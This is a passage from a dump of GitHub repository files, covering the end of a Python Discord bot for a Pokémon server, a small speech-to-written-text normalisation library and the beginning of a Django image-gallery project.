\"\r\n\t\tnumber = \"(17/17)\"\r\n\t\tif member.id in comp:\r\n\t\t\tb2 = \"You finished the League.\"\r\n\t\telse:\r\n\t\t\tb2 = \"You can access the League.\"\r\n\telse:\r\n\t\tb1 = \"Badges Left: \"\r\n\t\tnumber = \"(0/17)\"\r\n\t\tif member.id in pewter2:\r\n\t\t\tb2 = \"16 badges left\"\r\n\t\t\tnumber = \"(1/17)\"\r\n\t\t\tif member.id in cerulean2:\r\n\t\t\t\tb2 = \"15 badges left\"\r\n\t\t\t\tnumber = \"(2/17)\"\r\n\t\t\t\tif member.id in vermilion2:\r\n\t\t\t\t\tb2 = \"14 badges left\"\r\n\t\t\t\t\tnumber = \"(3/17)\"\r\n\t\t\t\t\tif member.id in celadon2:\r\n\t\t\t\t\t\tb2 = \"13 badges left\"\r\n\t\t\t\t\t\tnumber = \"(4/17)\"\r\n\t\t\t\t\t\tif member.id in fuschia2:\r\n\t\t\t\t\t\t\tb2 = \"12 badges left\"\r\n\t\t\t\t\t\t\tnumber = \"(5/17)\"\r\n\t\t\t\t\t\t\tif member.id in saffron2:\r\n\t\t\t\t\t\t\t\tb2 = \"11 badges left\"\r\n\t\t\t\t\t\t\t\tnumber = \"(6/17)\"\r\n\t\t\t\t\t\t\t\tif member.id in cinnabar2:\r\n\t\t\t\t\t\t\t\t\tb2 = \"10 badges left\"\r\n\t\t\t\t\t\t\t\t\tnumber = \"(7/17)\"\r\n\t\t\t\t\t\t\t\t\tif member.id in viridian2:\r\n\t\t\t\t\t\t\t\t\t\tb2 = \"9 badges left\"\r\n\t\t\t\t\t\t\t\t\t\tnumber = \"(8/17)\"\r\n\t\t\t\t\t\t\t\t\t\tif member.id in violet2:\r\n\t\t\t\t\t\t\t\t\t\t\tb2 = \"8 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\tnumber = \"(9/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\tif member.id in azalea2:\r\n\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"7 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(10/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\tif member.id in goldenrod2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"6 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(11/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in ecruteak2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"5 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(12/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in cianwood2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"4 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(13/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in olivine2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"3 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(14/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in mahogany2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"2 badges left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(15/17)\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tif member.id in blackthorn2:\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tb2 = \"1 badge left\"\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tnumber = \"(16/17)\"\r\n\t\telse:\r\n\t\t\tb2 = \"No badges acquired.\"\r\n\r\n\tif member.id in laverre2:\r\n\t\tif member.id in started:\r\n\t\t\tleague1 = \"<:Elite_4_Fight:449629015872110592>\"\r\n\t\t\tleague2 = \"Started the League\"\r\n\t\t\tif member.id in master:\r\n\t\t\t\tleague1 = \"<:Elite_Master_Fight:449628615156564015>\"\r\n\t\t\t\tleague2 = \"Fighting VS. Elite Master\"\r\n\t\t\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\t\tif member.id in master:\r\n\t\t\t\tleague1 = \"<:Elite_Master_Fight:449628615156564015>\"\r\n\t\t\t\tleague2 = \"Fighting VS. 
Elite Master\"\r\n\t\t\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\t\tif member.id in comp:\r\n\t\t\t\t\tleague1 = \"<:Completed:449628616284831744>\"\r\n\t\t\t\t\tleague2 = \"Completed the League\"\r\n\r\n\r\n\te.set_footer(text = f\"Member since: {member.joined_at.__format__('%d %b %Y at %H:%M:%S')}\")#.timestamp = member.joined_at\r\n\te.add_field(name = 'Account created at', value = member.created_at.__format__('Date: **%d %b %Y**\\nTime: **%H:%M:%S**\\nㅤ'))\r\n\te.add_field(name = 'User ID', value = member.id)\r\n\te.add_field(name = f\"{b1}{number}\", value = b2, inline=True)\r\n\te.add_field(name = f\"Social Status/Role {league1}\", value = f\"{features17}\\n{league2}\", inline=True)\r\n\te.add_field(name = 'Pokébadges', value = f\"{features}ㅤ{features1}ㅤ{features2}ㅤ{features3}ㅤ{features4}ㅤ{features5}\\n\\n{features6}ㅤ{features7}ㅤ{features8}ㅤ{features9}ㅤ{features10}ㅤ{features11}\\n\\n{features12}ㅤ{features13}ㅤ{features14}ㅤ{features15}ㅤ{features16}\", inline = True)\r\n\r\n\tawait ctx.send(embed=e)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t CUSTOM EMBEDS \t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def erules(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\te2 = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tberry = bot.get_user(385419569558323202)\r\n\tgeneral = bot.get_channel(457860924515155969)\r\n\tinternational = bot.get_channel(457860854017294336)\r\n\tsuggestion = bot.get_channel(449199119148253195)\r\n\tannouncement = bot.get_channel(447492742315114496)\r\n\tfaq = bot.get_channel(450039051169300500)\r\n\tpokemon = bot.get_channel(457860659095535626)\r\n\ttrading1 = bot.get_channel(450040365555122187)\r\n\ttrading2 = bot.get_channel(450040431686713367)\r\n\r\n\te.set_author(name = \"Welcome to Pokémon Universe\", icon_url = avi)\r\n\te.add_field(name = \"Server Rules\", value = \"**#1.** No need for personal attacks. 
If you have a problem with someone contact one of the Admins/Mods, we will help you.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#2.** Spam of any kind will not be tolerated and may result in a server mute.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#3.** No NSFW content.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#4.** Don't impersonate other players.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#5.** Don't use commands other than `p!catch` and `p!info` in {general.mention} or {international.mention}.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#6.** Try to keep swearing to a minimum in {general.mention}, some swearing will be tolerated but try not to.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#7.** Don't advertise your servers in chat or in DMs *(3 day mute in the server, if repeated you will be banned - DM advertising = ban)*\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#8.** {suggestion.mention} is not for having conversations or using the bot commands, it's for suggestions, use the correct channels.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#9.** No racial slurs.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#10.** Don't tag {berry.mention} or Admins unless there is an urgent issue. Try messaging a Moderator first. Doing so for no reason will result in a 2 hour mute.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#11.** Try not to beg for credits/redeems/pokemons.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#12.** Don't joke about suicide.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#13.** Keep chat in English or use {international.mention}.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#14.** Read {faq.mention} and {announcement.mention} before messaging a staff member, chances are the answer to your question is in there.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#15.** Do not repeatedly use a bot command for no reason.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = f\"**#16.** Don't use `p!info <pokemon>` in general use {pokemon.mention} please.\", inline=False)\r\n\te.add_field(name = \"ㅤ\", value = \"**#17.** Follow Discord [Terms of Service](https://discordapp.com/terms) and [Community Guidelines](https://discordapp.com/guidelines)\", inline=False)\r\n\r\n\te2.add_field(name = \"Trading Rules\", value = \"**#1.** As it is easy to guess, scamming is forbidden.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = f\"**#2.** Use {trading1.mention} and {trading2.mention} only to advertise your offers.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = \"**#3.** If your trading message is considered too long a mod may warn you for it, and if repeated you will be muted.\", inline=False)\r\n\te2.add_field(name = \"ㅤ\", value = \"**#4.** Posting more than ONE trading message per minute will result in a mute/warn.\", inline=False)\r\n\te2.set_footer(text = \"If a rule is broken and no Admins or Moderators see it, please mention a Moderator.\", icon_url=avi)\r\n\r\n\tawait ctx.send(embed = e)\r\n\tawait ctx.send(embed = e2)\r\n\r\n###################################################################################\r\n\r\[email protected]()\r\nasync def eroles(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tmee = bot.get_user(159985870458322944)\r\n\tpoke = 
bot.get_user(448885364275281931)\r\n\r\n\te.set_author(name = \"Self-Assignable Roles\", icon_url = avi)\r\n\te.description= \"If you want a role, just click the emoji dedicated to the role you'd like to have, to assign it to yourself.\\nIf you would like to take it off, just click the emoji again to remove it!\"\r\n\te.add_field(name=\"Leveled Roles\", value=f\"Those are automatically assigned by {mee.mention} when you reach the correct level.\", inline=False)\r\n\te.add_field(name=\"Other Roles\", value=f\"Those are assigned by Gym Leaders/Elite Fours using {poke.mention} when you beat their arena.\", inline=False)\r\n\te.set_footer(text = \"Custom Roles can be bought by donating at least 1$.\")\r\n\r\n\tawait ctx.send(embed = e)\r\n\r\n###################################################################################\r\n\r\n@bot.command()\r\nasync def efaq(ctx):\r\n\r\n\te = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\te2 = discord.Embed(colour = discord.Colour(0x7289DA))\r\n\r\n\tguild = ctx.guild\r\n\tavi = guild.icon_url\r\n\tpoke = bot.get_user(448885364275281931)\r\n\trules = bot.get_channel(447493465241026560)\r\n\trole = bot.get_channel(449199056154263552)\r\n\tannouncement = bot.get_channel(447492742315114496)\r\n\r\n\te.set_author(name = \"Donations\", icon_url = avi)\r\n\te.add_field(name=\"Why would I donate?\", value=f\"Donating supports the server and also the development of {poke.mention}. You get perks too: 250 credits for each 25 cents donated! You also get a special role that only donators have, and a custom role if you donate 1$ or more.\\nㅤ\", inline=False)\r\n\te.add_field(name=\"Where can I donate?\", value=\"You can donate through PayPal with the link provided by `p!donation`.\", inline=False)\r\n\r\n\te2.set_author(name = \"Other Questions\", icon_url = avi)\r\n\te2.add_field(name=\"IVs and Pokemon Stats\", value=\"IVs can now be seen with `p!detailed` and then `p!info`. IVs are individual values of each unique pokemon and they do not change through levels. They are used to calculate the final stats of each pokemon. They range from 0-31.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can I be unmuted please?\", value=\"If you're muted it's for a reason, nah? If not, prove it. So... No.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can I message Admins privately?\", value=\"Yes. But please, only do so when it's absolutely important. You are not the only one who thought of messaging an admin/mod to joke around. We don't wanna get tons of messages, as after some point it gets annoying.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"This person is catching all the pokemon! They are using copy-pasting to catch! We can't catch pokemon when they are here.\", value=\"What do you expect us to do? It's all fair game. Just do what they are doing if you are so desperate to catch pokemon.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can you spawn a pokemon?\", value=\"No we can't, sorry.. ^^'\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Can you give me a pokemon?\", value=f\"Read the {rules.mention}, no begging.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"When are you gonna do giveaways?\", value=\"When the server hits major member counts, for example 100 players.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"Where's the spam/NSFW channel?\", value=\"Nowhere. Spamming and NSFW are not allowed in any channel of the server. If you wanna see NSFW things there are webpages for that.\\nㅤ\", inline=False)
\r\n\te2.add_field(name=\"How much is <pokemon> worth?\", value=\"There are no set prices. Prices vary depending on how many people want the pokemon and how strong it is. You decide how much a pokemon is worth by following market prices. Not admins.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"How do I make my own team?\", value=f\"We are not accepting any new teams at the moment. Please join the already existing ones. You can find them in {role.mention}.\\nㅤ\", inline=False)\r\n\te2.add_field(name=\"How can we be recruited?\", value=f\"When we need new staff, we post a Google Document (to fill in) in {announcement.mention}; you must be active and fill in this Document seriously, with developed answers.\", inline=False)\r\n\te2.set_footer(text =\"Any other questions? You can ask other members or contact the staff team.\")\r\n\r\n\tawait ctx.send(embed = e)\r\n\tawait ctx.send(embed = e2)\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t BOT/SERVER STATS \t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\n@bot.command(aliases = ['stats'])\r\nasync def about(ctx):\r\n    # Fixed: this command previously took `self` and used `self.bot`/`self.send`,\r\n    # which fails for a plain bot command; it now uses `ctx` and the global `bot`.\r\n    stat1 = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n    servers = len(bot.guilds)\r\n    members = 0\r\n    for guild in bot.guilds:\r\n        members += len(guild.members)\r\n    total_online = len({m.id for m in bot.get_all_members() if m.status is not discord.Status.offline})\r\n    total_unique = len(bot.users)\r\n    total_bots = len([m.id for m in bot.get_all_members() if m.bot])\r\n    categories = 0\r\n    for guild in bot.guilds:\r\n        categories += len(guild.categories)\r\n    channels = 0\r\n    for guild in bot.guilds:\r\n        channels += len(guild.channels)\r\n    texts = 0\r\n    for guild in bot.guilds:\r\n        texts += len(guild.text_channels)\r\n    voices = 0\r\n    for guild in bot.guilds:\r\n        voices += len(guild.voice_channels)\r\n\r\n    stat2 = bot.get_user(390478999828037632)\r\n\r\n    stat1.set_author(name= stat2)\r\n    stat1.add_field(name= \"Members in serverㅤ\", value=f\"Total Users: **{members}** \\nTotal Uniques: **{total_unique}** \\nTotal Online: **{total_online}** \\nTotal BOTS: **{total_bots}**\", inline=True)\r\n    stat1.add_field(name= \"Channels in server\", value=f\"Total Categories: **{categories}** \\nTotal Channels: **{channels}** \\nText Channels: **{texts}** \\nVoice Channels: **{voices}**\", inline=True)\r\n    stat1.add_field(name= \"Program Information\", value=f\"Program Language: **<:Python:453634265197051934> 3.6.3** \\nDiscord Library: **Discord.py** \\nProgram Version: **1.0.0a**\", inline=True)\r\n    stat1.add_field(name= \"ㅤRun/Bot Information\", value=f\"ㅤRunning on: **Heroku** <:Heroku:453634258041438210>\\nㅤEdited with: **Sublime Text 3** <:Sublime:453634264248877056>\\n\\nㅤ*More with `p!helpme` command*\", inline=True)\r\n    await ctx.send(embed = stat1)
\r\n\r\n###################################################################################\r\n###################################################################################\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t SNOWBALL COMMAND \t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t###\r\n###################################################################################\r\n###################################################################################\r\n\r\n@bot.command(aliases = ['sb'])\r\nasync def snowball(ctx, *, member : discord.Member = None):\r\n\r\n    number = random.randint(1, 5)  # 1-in-5 chance to land a hit\r\n\r\n    if not member:\r\n        await ctx.send(f\"**{ctx.author.name}**, maybe pick someone to throw it at!\")\r\n    elif member == ctx.author:\r\n        await ctx.send(f\"**{ctx.author.name}**, maybe pick someone else to throw it at!\")\r\n    else:\r\n        if number == 1:\r\n            # The plain snowball line is repeated to outweigh the rarer iceball line.\r\n            snowball_hit = [\r\n                f\":snowflake: **| {ctx.author.name}** throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n                f\":snowflake: **| {ctx.author.name}** throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n                f\":snowflake: **| {ctx.author.name}** throws a snowball in **{member.name}**'s face! *ouchh*\",\r\n                f\":snowflake: **| {ctx.author.name}** throws an __iceball__ in **{member.name}**'s face! *ouchh... these ones hurt...*\",\r\n            ]\r\n\r\n            choice_hit = random.choice(snowball_hit)\r\n            hit = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n            hit.description = f\"{choice_hit}\"\r\n            await ctx.send(embed = hit)\r\n        else:\r\n            snowball_miss = [\r\n                f\":snowflake: **| {member.name}** dodged the snowball thrown by **{ctx.author.name}**!\",\r\n                f\":snowflake: **| {ctx.author.name}** tried to throw a snowball at **{member.name}** and missed!\",\r\n                f\":snowflake: **| {ctx.author.name}** missed and threw the snowball through a window! *Oops*\",\r\n                f\":snowflake: **| {member.name}** laughed at **{ctx.author.name}**: how can you miss me?\",\r\n                f\":snowflake: **| {ctx.author.name}** tries to use all their energy, and falls on the ground! *definitely a miss*\",\r\n                f\":snowflake: **| {ctx.author.name}** tried to throw an __iceball__ at **{member.name}** and missed! Lucky you, **{member.name}**!\",\r\n            ]\r\n\r\n            choice_miss = random.choice(snowball_miss)\r\n            miss = discord.Embed(colour = discord.Colour(0xE4D7FF))\r\n            miss.description = f\"{choice_miss}\"\r\n            await ctx.send(embed = miss)\r\n\r\n###################################################################################\r\n\r\n# Fixed: the original printed a warning but still called .strip() on None when\r\n# the TOKEN environment variable was missing; it now exits instead.\r\ntoken = os.environ.get('TOKEN')\r\nif not token:\r\n    raise SystemExit(\"No token found REEEE!\")\r\nbot.run(token.strip('\\\"'))\r\n\r\n#https://discordapp.com/oauth2/authorize/?permissions=2138569983&scope=bot&client_id=448885364275281931\r\n" } ]
1
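Editor's note on the `about` command in the record above: it tallies members and channels with four separate passes over `bot.guilds`. A minimal sketch of an equivalent helper using generator expressions, assuming the same discord.py `bot` object; this helper is not part of the original repo:

```python
# Hypothetical helper (not in the original bot): aggregate guild statistics
# with generator expressions instead of four explicit counting loops.
def guild_stats(bot):
    members = sum(len(g.members) for g in bot.guilds)
    categories = sum(len(g.categories) for g in bot.guilds)
    channels = sum(len(g.channels) for g in bot.guilds)
    texts = sum(len(g.text_channels) for g in bot.guilds)
    voices = sum(len(g.voice_channels) for g in bot.guilds)
    return members, categories, channels, texts, voices
```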
Utkarshupd/speak2write
https://github.com/Utkarshupd/speak2write
a1c30edadd265fc257902d47fbfc54e32323c040
de301bc407141ad3470d1ec11cb90d636eb77684
7b59b7eccc8cbe527930e262ab0b445a6d06b681
refs/heads/master
2020-08-28T16:50:32.024667
2019-10-26T20:11:16
2019-10-26T20:11:16
217,500,431
0
0
MIT
2019-10-25T09:32:30
2019-10-25T12:51:30
2019-10-25T12:51:28
Python
[ { "alpha_fraction": 0.7184643745422363, "alphanum_fraction": 0.7285192012786865, "avg_line_length": 38.07143020629883, "blob_id": "a674dd984f0b5588829de03cd0dda2096bc26dce", "content_id": "86e15e5ca9248ce3c4f7ce99b4747bf2d7138005", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1094, "license_type": "permissive", "max_line_length": 110, "num_lines": 28, "path": "/README.md", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "# speak2write:\n\nThis is a special library which is build to convert speech from spoken format to written format.\n\nFor example: \" I have two dollars\" should be conerted to \"I have 2$\"\n\nThe solution of the problem consists of many layers of functions, each doing its own stuff.\n\n## Features Implemented:\n- 1- Preprocessing the input.\n \n Given the input in raw form. This module helps speech data to get into better format for the conversion.\n \n- 2- Text2integer will convert numbers in words format to their respective number format.\n \n Two hundred = 200\n \n - 3- Currency Converter will convert given currency in text foramt into its currency format.\n \n 5 dollars = 5$\n \n## Features to be implemented:\n\n- Reading data from any format. Currently we can only give spoken text data in string format.\n- We have to take care of text Abbreventions such as 'dunno' should be converted to 'do not know', etc.\n- Pauses in speech must be handled.\n- fillers in speech must be handled.\n- same word occuring more than one time one after the other must be handled.\n" }, { "alpha_fraction": 0.48765432834625244, "alphanum_fraction": 0.4888888895511627, "avg_line_length": 27.629629135131836, "blob_id": "3c8e71682520b07f1b352ca8d42a6609c3aeaa01", "content_id": "c3b6e11ab358ae9820e3dc4f71180427acd35111", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 810, "license_type": "permissive", "max_line_length": 84, "num_lines": 27, "path": "/speak2write/currency.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "#This code only for conversion of currency dollar.Any other currency can be updated.\r\n\r\nclass Dollar:\r\n def __init__(self, value):\r\n self.value = value\r\n def __add__(self, other):\r\n return Dollar(self.value + other.value)\r\n def __sub__(self, other):\r\n return Dollar(self.value - other.value)\r\n def __repr__(self):\r\n return 'Dollar({})'.format(self.value)\r\n def __str__(self):\r\n return '${:.2f}'.format(self.value)\r\n \r\n\r\nclass currency(object):\r\n \"\"\"docstring for currency\"\"\"\r\n def __init__(self):\r\n pass\r\n\r\n def tocurrency(sentence):\r\n \r\n for i in sentence:\r\n if i.isdigit():\r\n return Dollar(i).__str__()\r\n else:\r\n pass\r\n\r\n " }, { "alpha_fraction": 0.5959596037864685, "alphanum_fraction": 0.5959596037864685, "avg_line_length": 30.68000030517578, "blob_id": "0a178ffbf00302d9cc2dc6c1a80762ea0b57bb43", "content_id": "b352ee2a216af6ed56c6262b0b60f27ee6300643", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "permissive", "max_line_length": 114, "num_lines": 50, "path": "/speak2write/preprocess_text.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "import string\nimport re\n\nclass preprocess_text:\n \"\"\"Given a sentence, this clas is used to apply some preprocessing functions before going to further steps.\"\"\"\n\n\n def 
__init__(self):\n pass\n\n @staticmethod\n def decontract(sentence):\n sentence = re.sub(r\"won\\'t\", \"will not\", sentence)\n sentence = re.sub(r\"can\\'t\", \"can not\", sentence)\n\n # general\n sentence = re.sub(r\"n\\'t\", \" not\", sentence)\n sentence = re.sub(r\"\\'re\", \" are\", sentence)\n sentence = re.sub(r\"\\'s\", \" is\", sentence)\n sentence = re.sub(r\"\\'d\", \" would\", sentence)\n sentence = re.sub(r\"\\'ll\", \" will\", sentence)\n sentence = re.sub(r\"\\'t\", \" not\", sentence)\n sentence = re.sub(r\"\\'ve\", \" have\", sentence)\n sentence = re.sub(r\"\\'m\", \" am\", sentence)\n return sentence\n\n\n @staticmethod\n def remove_punct(sentence):\n remove = string.punctuation\n remove = remove.replace(\"$\", \"\") # don't remove hyphens\n remove = remove.replace(\"&\", \"\") # don't remove hyphens\n remove = remove.replace(\"%\", \"\") # don't remove hyphens\n\n pattern = r\"[{}]\".format(remove) # create the pattern\n\n sentence = re.sub(pattern, \"\", sentence) \n return sentence\n\n @staticmethod\n def remove_whitespace(sentence):\n return sentence.strip()\n \n @staticmethod\n def prepro(sentence):\n sentence=preprocess_text.decontract(sentence)\n sentence=preprocess_text.remove_punct(sentence)\n sentence=preprocess_text.remove_whitespace(sentence)\n\n return sentence\n" }, { "alpha_fraction": 0.7473053932189941, "alphanum_fraction": 0.7700598835945129, "avg_line_length": 38.71428680419922, "blob_id": "9b7c67b6e4e0b0801d94394f2431bdfcfa15424a", "content_id": "8c0cbac0d7db395e62e0ae6fbb49ab96510a7290", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 841, "license_type": "permissive", "max_line_length": 113, "num_lines": 21, "path": "/example.py", "repo_name": "Utkarshupd/speak2write", "src_encoding": "UTF-8", "text": "from spoken2writ import currency,text2int,preprocess_text\n\n\nspoken_text = \"\"\" Hey, did you know that - the summer break is coming? Amazing right!! It’s only 5 more days!!\"\"\"\n\n\n# The preprocess_text module will perform various functions like removing whitespaces,decontracting etc.\nprint(preprocess_text().prepro(spoken_text))\n#Output will be: “Hey did you know that the summer break is coming Amazing right Its only 5 more days”\n\n# The text2int module will convert any spoken number into its numerical form.\nspoken_text = \"\"\"seven billion one hundred million thirty one thousand three hundred thirty seven \"\"\"\n\nprint(text2int().text2num(spoken_text))\n#Output will be: 7100031337\n\n#The currency modelu will convert currency dollar to its numerical form.\nspoken_text = '5'\nprint(currency().tocurrency(spoken_text))\n\n#Output will be: $5\n\n" } ]
4
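Editor's note: example.py in the record above imports `text2int`, but no text2int module appears among this record's four files. A minimal sketch of what such a word-to-number parser could look like, consistent with the example's expected output of 7100031337; this is an assumption about the missing module, not the repo's actual code:

```python
# Hypothetical stand-in for the missing speak2write/text2int.py module.
class text2int:
    UNITS = ["zero", "one", "two", "three", "four", "five", "six", "seven",
             "eight", "nine", "ten", "eleven", "twelve", "thirteen",
             "fourteen", "fifteen", "sixteen", "seventeen", "eighteen",
             "nineteen"]
    TENS = ["", "", "twenty", "thirty", "forty", "fifty", "sixty",
            "seventy", "eighty", "ninety"]
    SCALES = {"thousand": 10 ** 3, "million": 10 ** 6, "billion": 10 ** 9}

    def text2num(self, sentence):
        result = current = 0
        for word in sentence.lower().split():
            if word in self.UNITS:
                current += self.UNITS.index(word)      # e.g. "seven" -> 7
            elif word in self.TENS:
                current += self.TENS.index(word) * 10  # e.g. "thirty" -> 30
            elif word == "hundred":
                current *= 100
            elif word in self.SCALES:
                result += current * self.SCALES[word]  # flush at each scale word
                current = 0
        return result + current

# text2int().text2num("seven billion one hundred million thirty one "
#                     "thousand three hundred thirty seven") == 7100031337
```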
mateodevia/TDD-kata2
https://github.com/mateodevia/TDD-kata2
d885329fd1e7290c96051a427f46c94c0e3e9cdb
35c55391dab5fac9eb985365e974633672036729
f0e8d088f98710f4d1ff3d33f484d46dd0b2d495
refs/heads/master
2021-04-23T18:33:24.157690
2020-03-29T17:49:43
2020-03-29T17:49:43
249,967,927
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6933462023735046, "alphanum_fraction": 0.6933462023735046, "avg_line_length": 33.56666564941406, "blob_id": "ba2353178a65a8620016b4831a9de7781c7dc06b", "content_id": "d716c5207b28bba9f49304d2944aa5a4155a5331", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1037, "license_type": "no_license", "max_line_length": 85, "num_lines": 30, "path": "/galleryTddProject/gallery/views.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib.auth.models import User\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core import serializers\nfrom .models import Image\nimport json\n\n# Create your views here.\n@csrf_exempt\ndef index(request):\n images_list = Image.objects.all()\n return HttpResponse(serializers.serialize(\"json\", images_list))\n\n@csrf_exempt\ndef add_user_view(request):\n if request.method == 'POST':\n json_user = json.loads(request.body)\n username = json_user['username']\n first_name = json_user['first_name']\n last_name = json_user['last_name']\n password = json_user['password']\n email = json_user['email']\n\n user_model = User.objects.create_user(username=username, password=password)\n user_model.first_name = first_name\n user_model.last_name = last_name\n user_model.email = email\n user_model.save()\n return HttpResponse(serializers.serialize(\"json\", [user_model]))\n" }, { "alpha_fraction": 0.8240000009536743, "alphanum_fraction": 0.8240000009536743, "avg_line_length": 30.25, "blob_id": "c23bcb0eb9144e72f197f1c7188880ac6518571c", "content_id": "e0385ec77e81a1a014f9cf0ec9fcaf6b84cc7cd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 32, "num_lines": 4, "path": "/galleryTddProject/portafolio/admin.py", "repo_name": "mateodevia/TDD-kata2", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom .models import Portafolio\n# Register your models here.\nadmin.site.register(Portafolio)\n" }, { "alpha_fraction": 0.7019591331481934, "alphanum_fraction": 0.7044602036476135, "avg_line_length": 35.318180084228516, "blob_id": "1244dbfc6be176935732d95e9e55aef6d086d239", "content_id": "fcd27748714e64021c1c8e2d5be669c86e1dec2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 